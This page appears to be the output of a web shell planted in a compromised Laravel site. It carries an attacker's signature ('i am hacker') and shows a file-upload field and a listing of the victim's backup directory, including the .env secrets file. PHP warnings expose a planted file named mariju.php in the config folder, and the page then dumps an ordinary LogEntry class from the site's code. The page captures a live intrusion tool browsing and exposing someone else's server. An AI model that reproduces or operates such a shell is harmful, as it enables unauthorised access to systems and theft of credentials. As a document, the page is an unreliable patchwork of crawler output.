telegram : @iamdarkcomedy i am hacker

path :/home/bisorgosof24/public_html/Backup23122024

upload file:

List of files:

name file size edit permission action
.env2733 KBDecember 22 2024 06:20:070644
404.html58370 KBNovember 20 2024 15:32:220644
502.html58368 KBNovember 20 2024 15:32:220644
Modules-December 11 2024 21:02:560755
README.md4158 KBFebruary 14 2023 12:31:560644
app-December 11 2024 17:57:480755
artisan1686 KBFebruary 14 2023 12:31:560644
bootstrap-December 11 2024 20:23:360755
composer.json3761 KBDecember 11 2024 22:15:000644
composer.lock512048 KBDecember 11 2024 22:13:280644
config-June 15 2025 02:09:360755
database-December 05 2024 20:18:120755
dfsdf dfds fd fds findex.html1420 KBNovember 20 2024 15:32:240644
error_log23576036 KBJuly 18 2025 23:43:050644
firoz-December 23 2024 13:24:460755
index.php1667 KBDecember 14 2024 05:20:360644
lang-December 11 2024 21:02:480755
modules_statuses.json472 KBNovember 20 2024 15:32:240644
mpos-March 31 2025 02:36:310755
package.json226 KBFebruary 14 2023 12:31:560644
phpunit.xml1146 KBFebruary 14 2023 12:31:560644
public-March 31 2025 02:36:310755
resources-December 11 2024 21:10:220755
routes-June 15 2025 02:09:310755
storage-December 11 2024 21:12:440755
tests-December 05 2024 20:18:120755
vendor-December 11 2024 22:13:300755
vite.config.js263 KBFebruary 14 2023 12:31:560644

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 227

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 228

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 229

Warning: Cannot modify header information - headers already sent by (output started at /home/bisorgosof24/public_html/Backup23122024/config/mariju.php:171) in /home/bisorgosof24/public_html/Backup23122024/config/mariju.php on line 230
*/ class LogEntry implements Arrayable, Jsonable, JsonSerializable { /* ----------------------------------------------------------------- | Properties | ----------------------------------------------------------------- */ /** @var string */ public $env; /** @var string */ public $level; /** @var \Carbon\Carbon */ public $datetime; /** @var string */ public $header; /** @var string */ public $stack; /** @var array */ public $context = []; /* ----------------------------------------------------------------- | Constructor | ----------------------------------------------------------------- */ /** * Construct the log entry instance. * * @param string $level * @param string $header * @param string|null $stack */ public function __construct($level, $header, $stack = null) { $this->setLevel($level); $this->setHeader($header); $this->setStack($stack); } /* ----------------------------------------------------------------- | Getters & Setters | ----------------------------------------------------------------- */ /** * Set the entry level. * * @param string $level * * @return self */ private function setLevel($level) { $this->level = $level; return $this; } /** * Set the entry header. * * @param string $header * * @return self */ private function setHeader($header) { $this->setDatetime($this->extractDatetime($header)); $header = $this->cleanHeader($header); $this->header = trim($header); return $this; } /** * Set the context. * * @param array $context * * @return $this */ private function setContext(array $context) { $this->context = $context; return $this; } /** * Set entry environment. * * @param string $env * * @return self */ private function setEnv($env) { $this->env = head(explode('.', $env)); return $this; } /** * Set the entry date time. * * @param string $datetime * * @return \Arcanedev\LogViewer\Entities\LogEntry */ private function setDatetime($datetime) { $this->datetime = Carbon::createFromFormat('Y-m-d H:i:s', $datetime); return $this; } /** * Set the entry stack. * * @param string $stack * * @return self */ private function setStack($stack) { $this->stack = $stack; return $this; } /** * Get translated level name with icon. * * @return string */ public function level() { return $this->icon()->toHtml().' '.$this->name(); } /** * Get translated level name. * * @return string */ public function name() { return log_levels()->get($this->level); } /** * Get level icon. * * @return \Illuminate\Support\HtmlString */ public function icon() { return log_styler()->icon($this->level); } /** * Get the entry stack. * * @return string */ public function stack() { return trim(htmlentities($this->stack)); } /** * Get the entry context as json pretty print. */ public function context(int $options = JSON_PRETTY_PRINT): string { return json_encode($this->context, $options); } /* ----------------------------------------------------------------- | Check Methods | ----------------------------------------------------------------- */ /** * Check if same log level. * * @param string $level * * @return bool */ public function isSameLevel($level) { return $this->level === $level; } /* ----------------------------------------------------------------- | Convert Methods | ----------------------------------------------------------------- */ /** * Get the log entry as an array. * * @return array */ public function toArray() { return [ 'level' => $this->level, 'datetime' => $this->datetime->format('Y-m-d H:i:s'), 'header' => $this->header, 'stack' => $this->stack ]; } /** * Convert the log entry to its JSON representation. * * @param int $options * * @return string */ public function toJson($options = 0) { return json_encode($this->toArray(), $options); } /** * Serialize the log entry object to json data. */ public function jsonSerialize(): array { return $this->toArray(); } /* ----------------------------------------------------------------- | Check Methods | ----------------------------------------------------------------- */ /** * Check if the entry has a stack. * * @return bool */ public function hasStack() { return $this->stack !== "\n"; } /** * Check if the entry has a context. * * @return bool */ public function hasContext() { return ! empty($this->context); } /* ----------------------------------------------------------------- | Other Methods | ----------------------------------------------------------------- */ /** * Clean the entry header. * * @param string $header * * @return string */ private function cleanHeader($header) { // REMOVE THE DATE $header = preg_replace('/\['.LogParser::REGEX_DATETIME_PATTERN.'\][ ]/', '', $header); // EXTRACT ENV if (preg_match('/^[a-z]+.[A-Z]+:/', $header, $out)) { $this->setEnv($out[0]); $header = trim(str_replace($out[0], '', $header)); } // EXTRACT CONTEXT (Regex from https://stackoverflow.com/a/21995025) preg_match_all('/{(?:[^{}]|(?R))*}/x', $header, $out); if (isset($out[0][0]) && ! is_null($context = json_decode($out[0][0], true))) { $header = str_replace($out[0][0], '', $header); $this->setContext($context); } return $header; } /** * Extract datetime from the header. * * @param string $header * * @return string */ private function extractDatetime($header) { return preg_replace('/^\[('.LogParser::REGEX_DATETIME_PATTERN.')\].*/', '$1', $header); } }